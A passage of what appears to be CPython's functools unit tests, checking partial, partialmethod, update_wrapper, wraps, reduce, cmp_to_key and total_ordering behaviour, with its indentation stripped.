p = self.partial(capture, a=1)
self.assertEqual(p.keywords, {'a':1})
self.assertEqual(p(), ((), {'a':1}))
self.assertEqual(p(b=2), ((), {'a':1, 'b':2}))
# keyword args in the call override those in the partial object
self.assertEqual(p(a=3, b=2), ((), {'a':3, 'b':2}))
def test_positional(self):
# make sure positional arguments are captured correctly
for args in [(), (0,), (0,1), (0,1,2), (0,1,2,3)]:
p = self.partial(capture, *args)
expected = args + ('x',)
got, empty = p('x')
self.assertTrue(expected == got and empty == {})
def test_keyword(self):
# make sure keyword arguments are captured correctly
for a in ['a', 0, None, 3.5]:
p = self.partial(capture, a=a)
expected = {'a':a,'x':None}
empty, got = p(x=None)
self.assertTrue(expected == got and empty == ())
def test_no_side_effects(self):
# make sure there are no side effects that affect subsequent calls
p = self.partial(capture, 0, a=1)
args1, kw1 = p(1, b=2)
self.assertTrue(args1 == (0,1) and kw1 == {'a':1,'b':2})
args2, kw2 = p()
self.assertTrue(args2 == (0,) and kw2 == {'a':1})
def test_error_propagation(self):
def f(x, y):
x / y
self.assertRaises(ZeroDivisionError, self.partial(f, 1, 0))
self.assertRaises(ZeroDivisionError, self.partial(f, 1), 0)
self.assertRaises(ZeroDivisionError, self.partial(f), 1, 0)
self.assertRaises(ZeroDivisionError, self.partial(f, y=0), 1)
def test_weakref(self):
f = self.partial(int, base=16)
p = proxy(f)
self.assertEqual(f.func, p.func)
f = None
self.assertRaises(ReferenceError, getattr, p, 'func')
def test_with_bound_and_unbound_methods(self):
data = list(map(str, range(10)))
join = self.partial(str.join, '')
self.assertEqual(join(data), '0123456789')
join = self.partial(''.join)
self.assertEqual(join(data), '0123456789')
def test_nested_optimization(self):
partial = self.partial
inner = partial(signature, 'asdf')
nested = partial(inner, bar=True)
flat = partial(signature, 'asdf', bar=True)
self.assertEqual(signature(nested), signature(flat))
def test_nested_partial_with_attribute(self):
# see issue 25137
partial = self.partial
def foo(bar):
return bar
p = partial(foo, 'first')
p2 = partial(p, 'second')
p2.new_attr = 'spam'
self.assertEqual(p2.new_attr, 'spam')
def test_repr(self):
args = (object(), object())
args_repr = ', '.join(repr(a) for a in args)
kwargs = {'a': object(), 'b': object()}
kwargs_reprs = ['a={a!r}, b={b!r}'.format_map(kwargs),
'b={b!r}, a={a!r}'.format_map(kwargs)]
if self.partial in (c_functools.partial, py_functools.partial):
name = 'functools.partial'
else:
name = self.partial.__name__
f = self.partial(capture)
self.assertEqual(f'{name}({capture!r})', repr(f))
f = self.partial(capture, *args)
self.assertEqual(f'{name}({capture!r}, {args_repr})', repr(f))
f = self.partial(capture, **kwargs)
self.assertIn(repr(f),
[f'{name}({capture!r}, {kwargs_repr})'
for kwargs_repr in kwargs_reprs])
f = self.partial(capture, *args, **kwargs)
self.assertIn(repr(f),
[f'{name}({capture!r}, {args_repr}, {kwargs_repr})'
for kwargs_repr in kwargs_reprs])
def test_recursive_repr(self):
if self.partial in (c_functools.partial, py_functools.partial):
name = 'functools.partial'
else:
name = self.partial.__name__
f = self.partial(capture)
f.__setstate__((f, (), {}, {}))
try:
self.assertEqual(repr(f), '%s(...)' % (name,))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (f,), {}, {}))
try:
self.assertEqual(repr(f), '%s(%r, ...)' % (name, capture,))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (), {'a': f}, {}))
try:
self.assertEqual(repr(f), '%s(%r, a=...)' % (name, capture,))
finally:
f.__setstate__((capture, (), {}, {}))
def test_pickle(self):
with self.AllowPickle():
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
self.assertEqual(signature(f_copy), signature(f))
def test_copy(self):
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
f_copy = copy.copy(f)
self.assertEqual(signature(f_copy), signature(f))
self.assertIs(f_copy.attr, f.attr)
self.assertIs(f_copy.args, f.args)
self.assertIs(f_copy.keywords, f.keywords)
def test_deepcopy(self):
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
f_copy = copy.deepcopy(f)
self.assertEqual(signature(f_copy), signature(f))
self.assertIsNot(f_copy.attr, f.attr)
self.assertIsNot(f_copy.args, f.args)
self.assertIsNot(f_copy.args[0], f.args[0])
self.assertIsNot(f_copy.keywords, f.keywords)
self.assertIsNot(f_copy.keywords['bar'], f.keywords['bar'])
def test_setstate(self):
f = self.partial(signature)
f.__setstate__((capture, (1,), dict(a=10), dict(attr=[])))
self.assertEqual(signature(f),
(capture, (1,), dict(a=10), dict(attr=[])))
self.assertEqual(f(2, b=20), ((1, 2), {'a': 10, 'b': 20}))
f.__setstate__((capture, (1,), dict(a=10), None))
self.assertEqual(signature(f), (capture, (1,), dict(a=10), {}))
self.assertEqual(f(2, b=20), ((1, 2), {'a': 10, 'b': 20}))
f.__setstate__((capture, (1,), None, None))
#self.assertEqual(signature(f), (capture, (1,), {}, {}))
self.assertEqual(f(2, b=20), ((1, 2), {'b': 20}))
self.assertEqual(f(2), ((1, 2), {}))
self.assertEqual(f(), ((1,), {}))
f.__setstate__((capture, (), {}, None))
self.assertEqual(signature(f), (capture, (), {}, {}))
self.assertEqual(f(2, b=20), ((2,), {'b': 20}))
self.assertEqual(f(2), ((2,), {}))
self.assertEqual(f(), ((), {}))
def test_setstate_errors(self):
f = self.partial(signature)
self.assertRaises(TypeError, f.__setstate__, (capture, (), {}))
self.assertRaises(TypeError, f.__setstate__, (capture, (), {}, {}, None))
self.assertRaises(TypeError, f.__setstate__, [capture, (), {}, None])
self.assertRaises(TypeError, f.__setstate__, (None, (), {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, None, {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, [], {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, (), [], None))
def test_setstate_subclasses(self):
f = self.partial(signature)
f.__setstate__((capture, MyTuple((1,)), MyDict(a=10), None))
s = signature(f)
self.assertEqual(s, (capture, (1,), dict(a=10), {}))
self.assertIs(type(s[1]), tuple)
self.assertIs(type(s[2]), dict)
r = f()
self.assertEqual(r, ((1,), {'a': 10}))
self.assertIs(type(r[0]), tuple)
self.assertIs(type(r[1]), dict)
f.__setstate__((capture, BadTuple((1,)), {}, None))
s = signature(f)
self.assertEqual(s, (capture, (1,), {}, {}))
self.assertIs(type(s[1]), tuple)
r = f(2)
self.assertEqual(r, ((1, 2), {}))
self.assertIs(type(r[0]), tuple)
def test_recursive_pickle(self):
with self.AllowPickle():
f = self.partial(capture)
f.__setstate__((f, (), {}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises(RecursionError):
pickle.dumps(f, proto)
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (f,), {}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
try:
self.assertIs(f_copy.args[0], f_copy)
finally:
f_copy.__setstate__((capture, (), {}, {}))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (), {'a': f}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
try:
self.assertIs(f_copy.keywords['a'], f_copy)
finally:
f_copy.__setstate__((capture, (), {}, {}))
finally:
f.__setstate__((capture, (), {}, {}))
# Issue 6083: Reference counting bug
def test_setstate_refcount(self):
class BadSequence:
def __len__(self):
return 4
def __getitem__(self, key):
if key == 0:
return max
elif key == 1:
return tuple(range(1000000))
elif key in (2, 3):
return {}
raise IndexError
f = self.partial(object)
self.assertRaises(TypeError, f.__setstate__, BadSequence())
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestPartialC(TestPartial, unittest.TestCase):
if c_functools:
partial = c_functools.partial
class AllowPickle:
def __enter__(self):
return self
def __exit__(self, type, value, tb):
return False
def test_attributes_unwritable(self):
# attributes should not be writable
p = self.partial(capture, 1, 2, a=10, b=20)
self.assertRaises(AttributeError, setattr, p, 'func', map)
self.assertRaises(AttributeError, setattr, p, 'args', (1, 2))
self.assertRaises(AttributeError, setattr, p, 'keywords', dict(a=1, b=2))
p = self.partial(hex)
try:
del p.__dict__
except TypeError:
pass
else:
self.fail('partial object allowed __dict__ to be deleted')
def test_manually_adding_non_string_keyword(self):
p = self.partial(capture)
# Adding a non-string/unicode keyword to partial kwargs
p.keywords[1234] = 'value'
r = repr(p)
self.assertIn('1234', r)
self.assertIn("'value'", r)
with self.assertRaises(TypeError):
p()
def test_keystr_replaces_value(self):
p = self.partial(capture)
class MutatesYourDict(object):
def __str__(self):
p.keywords[self] = ['sth2']
return 'astr'
# Replacing the value during key formatting should keep the original
# value alive (at least long enough).
p.keywords[MutatesYourDict()] = ['sth']
r = repr(p)
self.assertIn('astr', r)
self.assertIn("['sth']", r)
class TestPartialPy(TestPartial, unittest.TestCase):
partial = py_functools.partial
class AllowPickle:
def __init__(self):
self._cm = replaced_module("functools", py_functools)
def __enter__(self):
return self._cm.__enter__()
def __exit__(self, type, value, tb):
return self._cm.__exit__(type, value, tb)
if c_functools:
class CPartialSubclass(c_functools.partial):
pass
class PyPartialSubclass(py_functools.partial):
pass
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestPartialCSubclass(TestPartialC):
if c_functools:
partial = CPartialSubclass
# partial subclasses are not optimized for nested calls
test_nested_optimization = None
class TestPartialPySubclass(TestPartialPy):
partial = PyPartialSubclass
class TestPartialMethod(unittest.TestCase):
class A(object):
nothing = functools.partialmethod(capture)
positional = functools.partialmethod(capture, 1)
keywords = functools.partialmethod(capture, a=2)
both = functools.partialmethod(capture, 3, b=4)
spec_keywords = functools.partialmethod(capture, self=1, func=2)
nested = functools.partialmethod(positional, 5)
over_partial = functools.partialmethod(functools.partial(capture, c=6), 7)
static = functools.partialmethod(staticmethod(capture), 8)
cls = functools.partialmethod(classmethod(capture), d=9)
a = A()
def test_arg_combinations(self):
self.assertEqual(self.a.nothing(), ((self.a,), {}))
self.assertEqual(self.a.nothing(5), ((self.a, 5), {}))
self.assertEqual(self.a.nothing(c=6), ((self.a,), {'c': 6}))
self.assertEqual(self.a.nothing(5, c=6), ((self.a, 5), {'c': 6}))
self.assertEqual(self.a.positional(), ((self.a, 1), {}))
self.assertEqual(self.a.positional(5), ((self.a, 1, 5), {}))
self.assertEqual(self.a.positional(c=6), ((self.a, 1), {'c': 6}))
self.assertEqual(self.a.positional(5, c=6), ((self.a, 1, 5), {'c': 6}))
self.assertEqual(self.a.keywords(), ((self.a,), {'a': 2}))
self.assertEqual(self.a.keywords(5), ((self.a, 5), {'a': 2}))
self.assertEqual(self.a.keywords(c=6), ((self.a,), {'a': 2, 'c': 6}))
self.assertEqual(self.a.keywords(5, c=6), ((self.a, 5), {'a': 2, 'c': 6}))
self.assertEqual(self.a.both(), ((self.a, 3), {'b': 4}))
self.assertEqual(self.a.both(5), ((self.a, 3, 5), {'b': 4}))
self.assertEqual(self.a.both(c=6), ((self.a, 3), {'b': 4, 'c': 6}))
self.assertEqual(self.a.both(5, c=6), ((self.a, 3, 5), {'b': 4, 'c': 6}))
self.assertEqual(self.A.both(self.a, 5, c=6), ((self.a, 3, 5), {'b': 4, 'c': 6}))
self.assertEqual(self.a.spec_keywords(), ((self.a,), {'self': 1, 'func': 2}))
def test_nested(self):
self.assertEqual(self.a.nested(), ((self.a, 1, 5), {}))
self.assertEqual(self.a.nested(6), ((self.a, 1, 5, 6), {}))
self.assertEqual(self.a.nested(d=7), ((self.a, 1, 5), {'d': 7}))
self.assertEqual(self.a.nested(6, d=7), ((self.a, 1, 5, 6), {'d': 7}))
self.assertEqual(self.A.nested(self.a, 6, d=7), ((self.a, 1, 5, 6), {'d': 7}))
def test_over_partial(self):
self.assertEqual(self.a.over_partial(), ((self.a, 7), {'c': 6}))
self.assertEqual(self.a.over_partial(5), ((self.a, 7, 5), {'c': 6}))
self.assertEqual(self.a.over_partial(d=8), ((self.a, 7), {'c': 6, 'd': 8}))
self.assertEqual(self.a.over_partial(5, d=8), ((self.a, 7, 5), {'c': 6, 'd': 8}))
self.assertEqual(self.A.over_partial(self.a, 5, d=8), ((self.a, 7, 5), {'c': 6, 'd': 8}))
def test_bound_method_introspection(self):
obj = self.a
self.assertIs(obj.both.__self__, obj)
self.assertIs(obj.nested.__self__, obj)
self.assertIs(obj.over_partial.__self__, obj)
self.assertIs(obj.cls.__self__, self.A)
self.assertIs(self.A.cls.__self__, self.A)
def test_unbound_method_retrieval(self):
obj = self.A
self.assertFalse(hasattr(obj.both, "__self__"))
self.assertFalse(hasattr(obj.nested, "__self__"))
self.assertFalse(hasattr(obj.over_partial, "__self__"))
self.assertFalse(hasattr(obj.static, "__self__"))
self.assertFalse(hasattr(self.a.static, "__self__"))
def test_descriptors(self):
for obj in [self.A, self.a]:
with self.subTest(obj=obj):
self.assertEqual(obj.static(), ((8,), {}))
self.assertEqual(obj.static(5), ((8, 5), {}))
self.assertEqual(obj.static(d=8), ((8,), {'d': 8}))
self.assertEqual(obj.static(5, d=8), ((8, 5), {'d': 8}))
self.assertEqual(obj.cls(), ((self.A,), {'d': 9}))
self.assertEqual(obj.cls(5), ((self.A, 5), {'d': 9}))
self.assertEqual(obj.cls(c=8), ((self.A,), {'c': 8, 'd': 9}))
self.assertEqual(obj.cls(5, c=8), ((self.A, 5), {'c': 8, 'd': 9}))
def test_overriding_keywords(self):
self.assertEqual(self.a.keywords(a=3), ((self.a,), {'a': 3}))
self.assertEqual(self.A.keywords(self.a, a=3), ((self.a,), {'a': 3}))
def test_invalid_args(self):
with self.assertRaises(TypeError):
class B(object):
method = functools.partialmethod(None, 1)
with self.assertRaises(TypeError):
class B:
method = functools.partialmethod()
class B:
method = functools.partialmethod(func=capture, a=1)
b = B()
self.assertEqual(b.method(2, x=3), ((b, 2), {'a': 1, 'x': 3}))
def test_repr(self):
self.assertEqual(repr(vars(self.A)['both']),
'functools.partialmethod({}, 3, b=4)'.format(capture))
def test_abstract(self):
class Abstract(abc.ABCMeta):
@abc.abstractmethod
def add(self, x, y):
pass
add5 = functools.partialmethod(add, 5)
self.assertTrue(Abstract.add.__isabstractmethod__)
self.assertTrue(Abstract.add5.__isabstractmethod__)
for func in [self.A.static, self.A.cls, self.A.over_partial, self.A.nested, self.A.both]:
self.assertFalse(getattr(func, '__isabstractmethod__', False))
class TestUpdateWrapper(unittest.TestCase):
def check_wrapper(self, wrapper, wrapped,
assigned=functools.WRAPPER_ASSIGNMENTS,
updated=functools.WRAPPER_UPDATES):
# Check attributes were assigned
for name in assigned:
self.assertIs(getattr(wrapper, name), getattr(wrapped, name))
# Check attributes were updated
for name in updated:
wrapper_attr = getattr(wrapper, name)
wrapped_attr = getattr(wrapped, name)
for key in wrapped_attr:
if name == "__dict__" and key == "__wrapped__":
# __wrapped__ is overwritten by the update code
continue
self.assertIs(wrapped_attr[key], wrapper_attr[key])
# Check __wrapped__
self.assertIs(wrapper.__wrapped__, wrapped)
def _default_update(self):
def f(a:'This is a new annotation'):
"""This is a test"""
pass
f.attr = 'This is also a test'
f.__wrapped__ = "This is a bald faced lie"
def wrapper(b:'This is the prior annotation'):
pass
functools.update_wrapper(wrapper, f)
return wrapper, f
def test_default_update(self):
wrapper, f = self._default_update()
self.check_wrapper(wrapper, f)
self.assertIs(wrapper.__wrapped__, f)
self.assertEqual(wrapper.__name__, 'f')
self.assertEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.attr, 'This is also a test')
self.assertEqual(wrapper.__annotations__['a'], 'This is a new annotation')
self.assertNotIn('b', wrapper.__annotations__)
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_default_update_doc(self):
wrapper, f = self._default_update()
self.assertEqual(wrapper.__doc__, 'This is a test')
def test_no_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
def wrapper():
pass
functools.update_wrapper(wrapper, f, (), ())
self.check_wrapper(wrapper, f, (), ())
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.__annotations__, {})
self.assertFalse(hasattr(wrapper, 'attr'))
def test_selective_update(self):
def f():
pass
f.attr = 'This is a different test'
f.dict_attr = dict(a=1, b=2, c=3)
def wrapper():
pass
wrapper.dict_attr = {}
assign = ('attr',)
update = ('dict_attr',)
functools.update_wrapper(wrapper, f, assign, update)
self.check_wrapper(wrapper, f, assign, update)
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.attr, 'This is a different test')
self.assertEqual(wrapper.dict_attr, f.dict_attr)
def test_missing_attributes(self):
def f():
pass
def wrapper():
pass
wrapper.dict_attr = {}
assign = ('attr',)
update = ('dict_attr',)
# Missing attributes on wrapped object are ignored
functools.update_wrapper(wrapper, f, assign, update)
self.assertNotIn('attr', wrapper.__dict__)
self.assertEqual(wrapper.dict_attr, {})
# Wrapper must have expected attributes for updating
del wrapper.dict_attr
with self.assertRaises(AttributeError):
functools.update_wrapper(wrapper, f, assign, update)
wrapper.dict_attr = 1
with self.assertRaises(AttributeError):
functools.update_wrapper(wrapper, f, assign, update)
@support.requires_docstrings
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_builtin_update(self):
# Test for bug #1576241
def wrapper():
pass
functools.update_wrapper(wrapper, max)
self.assertEqual(wrapper.__name__, 'max')
self.assertTrue(wrapper.__doc__.startswith('max('))
self.assertEqual(wrapper.__annotations__, {})
class TestWraps(TestUpdateWrapper):
def _default_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
f.__wrapped__ = "This is still a bald faced lie"
@functools.wraps(f)
def wrapper():
pass
return wrapper, f
def test_default_update(self):
wrapper, f = self._default_update()
self.check_wrapper(wrapper, f)
self.assertEqual(wrapper.__name__, 'f')
self.assertEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.attr, 'This is also a test')
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_default_update_doc(self):
wrapper, _ = self._default_update()
self.assertEqual(wrapper.__doc__, 'This is a test')
def test_no_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
@functools.wraps(f, (), ())
def wrapper():
pass
self.check_wrapper(wrapper, f, (), ())
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertFalse(hasattr(wrapper, 'attr'))
def test_selective_update(self):
def f():
pass
f.attr = 'This is a different test'
f.dict_attr = dict(a=1, b=2, c=3)
def add_dict_attr(f):
f.dict_attr = {}
return f
assign = ('attr',)
update = ('dict_attr',)
@functools.wraps(f, assign, update)
@add_dict_attr
def wrapper():
pass
self.check_wrapper(wrapper, f, assign, update)
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.attr, 'This is a different test')
self.assertEqual(wrapper.dict_attr, f.dict_attr)
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestReduce(unittest.TestCase):
if c_functools:
func = c_functools.reduce
def test_reduce(self):
class Squares:
def __init__(self, max):
self.max = max
self.sofar = []
def __len__(self):
return len(self.sofar)
def __getitem__(self, i):
if not 0 <= i < self.max: raise IndexError
n = len(self.sofar)
while n <= i:
self.sofar.append(n*n)
n += 1
return self.sofar[i]
def add(x, y):
return x + y
self.assertEqual(self.func(add, ['a', 'b', 'c'], ''), 'abc')
self.assertEqual(
self.func(add, [['a', 'c'], [], ['d', 'w']], []),
['a','c','d','w']
)
self.assertEqual(self.func(lambda x, y: x*y, range(2,8), 1), 5040)
self.assertEqual(
self.func(lambda x, y: x*y, range(2,21), 1),
2432902008176640000
)
self.assertEqual(self.func(add, Squares(10)), 285)
self.assertEqual(self.func(add, Squares(10), 0), 285)
self.assertEqual(self.func(add, Squares(0), 0), 0)
self.assertRaises(TypeError, self.func)
self.assertRaises(TypeError, self.func, 42, 42)
self.assertRaises(TypeError, self.func, 42, 42, 42)
self.assertEqual(self.func(42, "1"), "1") # func is never called with one item
self.assertEqual(self.func(42, "", "1"), "1") # func is never called with one item
self.assertRaises(TypeError, self.func, 42, (42, 42))
self.assertRaises(TypeError, self.func, add, []) # arg 2 must not be empty sequence with no initial value
self.assertRaises(TypeError, self.func, add, "")
self.assertRaises(TypeError, self.func, add, ())
self.assertRaises(TypeError, self.func, add, object())
class TestFailingIter:
def __iter__(self):
raise RuntimeError
self.assertRaises(RuntimeError, self.func, add, TestFailingIter())
self.assertEqual(self.func(add, [], None), None)
self.assertEqual(self.func(add, [], 42), 42)
class BadSeq:
def __getitem__(self, index):
raise ValueError
self.assertRaises(ValueError, self.func, 42, BadSeq())
# Test reduce()'s use of iterators.
def test_iterator_usage(self):
class SequenceClass:
def __init__(self, n):
self.n = n
def __getitem__(self, i):
if 0 <= i < self.n:
return i
else:
raise IndexError
from operator import add
self.assertEqual(self.func(add, SequenceClass(5)), 10)
self.assertEqual(self.func(add, SequenceClass(5), 42), 52)
self.assertRaises(TypeError, self.func, add, SequenceClass(0))
self.assertEqual(self.func(add, SequenceClass(0), 42), 42)
self.assertEqual(self.func(add, SequenceClass(1)), 0)
self.assertEqual(self.func(add, SequenceClass(1), 42), 42)
d = {"one": 1, "two": 2, "three": 3}
self.assertEqual(self.func(add, d), "".join(d.keys()))
class TestCmpToKey:
def test_cmp_to_key(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(cmp1)
self.assertEqual(key(3), key(3))
self.assertGreater(key(3), key(1))
self.assertGreaterEqual(key(3), key(3))
def cmp2(x, y):
return int(x) - int(y)
key = self.cmp_to_key(cmp2)
self.assertEqual(key(4.0), key('4'))
self.assertLess(key(2), key('35'))
self.assertLessEqual(key(2), key('35'))
self.assertNotEqual(key(2), key('35'))
def test_cmp_to_key_arguments(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(mycmp=cmp1)
self.assertEqual(key(obj=3), key(obj=3))
self.assertGreater(key(obj=3), key(obj=1))
with self.assertRaises((TypeError, AttributeError)):
key(3) > 1 # rhs is not a K object
with self.assertRaises((TypeError, AttributeError)):
1 < key(3) # lhs is not a K object
with self.assertRaises(TypeError):
key = self.cmp_to_key() # too few args
with self.assertRaises(TypeError):
key = self.cmp_to_key(cmp1, None) # too many args
key = self.cmp_to_key(cmp1)
with self.assertRaises(TypeError):
key() # too few args
with self.assertRaises(TypeError):
key(None, None) # too many args
def test_bad_cmp(self):
def cmp1(x, y):
raise ZeroDivisionError
key = self.cmp_to_key(cmp1)
with self.assertRaises(ZeroDivisionError):
key(3) > key(1)
class BadCmp:
def __lt__(self, other):
raise ZeroDivisionError
def cmp1(x, y):
return BadCmp()
with self.assertRaises(ZeroDivisionError):
key(3) > key(1)
def test_obj_field(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(mycmp=cmp1)
self.assertEqual(key(50).obj, 50)
def test_sort_int(self):
def mycmp(x, y):
return y - x
self.assertEqual(sorted(range(5), key=self.cmp_to_key(mycmp)),
[4, 3, 2, 1, 0])
def test_sort_int_str(self):
def mycmp(x, y):
x, y = int(x), int(y)
return (x > y) - (x < y)
values = [5, '3', 7, 2, '0', '1', 4, '10', 1]
values = sorted(values, key=self.cmp_to_key(mycmp))
self.assertEqual([int(value) for value in values],
[0, 1, 1, 2, 3, 4, 5, 7, 10])
def test_hash(self):
def mycmp(x, y):
return y - x
key = self.cmp_to_key(mycmp)
k = key(10)
self.assertRaises(TypeError, hash, k)
self.assertNotIsInstance(k, collections.abc.Hashable)
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestCmpToKeyC(TestCmpToKey, unittest.TestCase):
if c_functools:
cmp_to_key = c_functools.cmp_to_key
class TestCmpToKeyPy(TestCmpToKey, unittest.TestCase):
cmp_to_key = staticmethod(py_functools.cmp_to_key)
class TestTotalOrdering(unittest.TestCase):
def test_total_ordering_lt(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __lt__(self, other):
return self.value < other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(1) > A(2))
def test_total_ordering_le(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __le__(self, other):
return self.value <= other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(1) >= A(2))
def test_total_ordering_gt(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __gt__(self, other):
return self.value > other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(2) < A(1))
def test_total_ordering_ge(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __ge__(self, other):
return self.value >= other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(2) <= A(1))
def test_total_ordering_no_overwrite(self):
# new methods should not overwrite existing
@functools.total_ordering
class A(int):
pass
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
def test_no_operations_defined(self):
with self.assertRaises(ValueError):
@functools.total_ordering
class A:
pass
def test_type_error_when_not_implemented(self):
# bug 10042; ensure stack overflow does not occur
# when decorated types return NotImplemented
@functools.total_ordering
class ImplementsLessThan:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsLessThan):
return self.value == other.value
return False
def __lt__(self, other):
if isinstance(other, ImplementsLessThan):
return self.value < other.value
return NotImplemented
@functools.total_ordering
class ImplementsGreaterThan:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsGreaterThan):
return self.value == other.value
return False
def __gt__(self, other):
if isinstance(other, ImplementsGreaterThan):
return self.value > other.value
return NotImplemented
@functools.total_ordering
class ImplementsLessThanEqualTo:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsLessThanEqualTo):
return self.value == other.value
return False
def __le__(self, other):
if isinstance(other, ImplementsLessThanEqualTo):
return self.value <= other.value
return NotImplemented
@functools.total_ordering
class ImplementsGreaterThanEqualTo:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsGreaterThanEqualTo):
return self.value == other.value
return False
def __ge__(self, other):
if isinstance(other, ImplementsGreaterThanEqualTo):
return self.value >= other.value
return NotImplemented
@functools.total_ordering
class ComparatorNotImplemented:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ComparatorNotImplemented):
return self.value == other.value
return False
def __lt__(self, other):
return NotImplemented
with self.subTest("LT < 1"), self.assertRaises(TypeError):
ImplementsLessThan(-1) < 1
with self.subTest("LT < LE"), self.assertRaises(TypeError):
ImplementsLessThan(0) < ImplementsLessThanEqualTo(0)
with self.subTest("LT < GT"), self.assertRaises(TypeError):
ImplementsLessThan(1) < ImplementsGreaterThan(1)
with self.subTest("LE <= LT"), self.assertRaises(TypeError):
ImplementsLessThanEqualTo(2) <= ImplementsLessThan(2)
with self.subTest("LE <= GE"), self.assertRaises(TypeError):
ImplementsLessThanEqualTo(3) <= ImplementsGreaterThanEqualTo(3)
with self.subTest("GT > GE"), self.assertRaises(TypeError):
ImplementsGreaterThan(4) > ImplementsGreaterThanEqualTo(4)
with self.subTest("GT > LT"), self.assertRaises(TypeError):
ImplementsGreaterThan(5) > ImplementsLessThan(5)
with self.subTest("GE >= GT"), self.assertRaises(TypeError):
ImplementsGreaterThanEqualTo(6) >= ImplementsGreaterThan(6)
with self.subTest("GE >= LE"), self.assertRaises(TypeError):
ImplementsGreaterThanEqualTo(7) >= ImplementsLessThanEqualTo(7)
with self.subTest("GE when equal"):
a = ComparatorNotImplemented(8)
b = ComparatorNotImplemented(8)
self.assertEqual(a, b)
with self.assertRaises(TypeError):
a >= b
with self.subTest("LE when equal"):
a = ComparatorNotImplemented(9)
b = ComparatorNotImplemented(9)
self.assertEqual(a, b)
with self.assertRaises(TypeError):
a <= b
def test_pickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for name in '__lt__', '__gt__', '__le__', '__ge__':
with self.subTest(method=name, proto=proto):
method = getattr(Orderable_LT, name)
method_copy = pickle.loads(pickle.dumps(method, proto))
self.assertIs(method_copy, method)
@functools.total_ordering
class Orderable_LT:
def __init__(self, value):
self.value = value
def __lt__(self, other):
return self.value < other.value
def __eq__(self, other):
return self.value == other.value
class TestLRU:
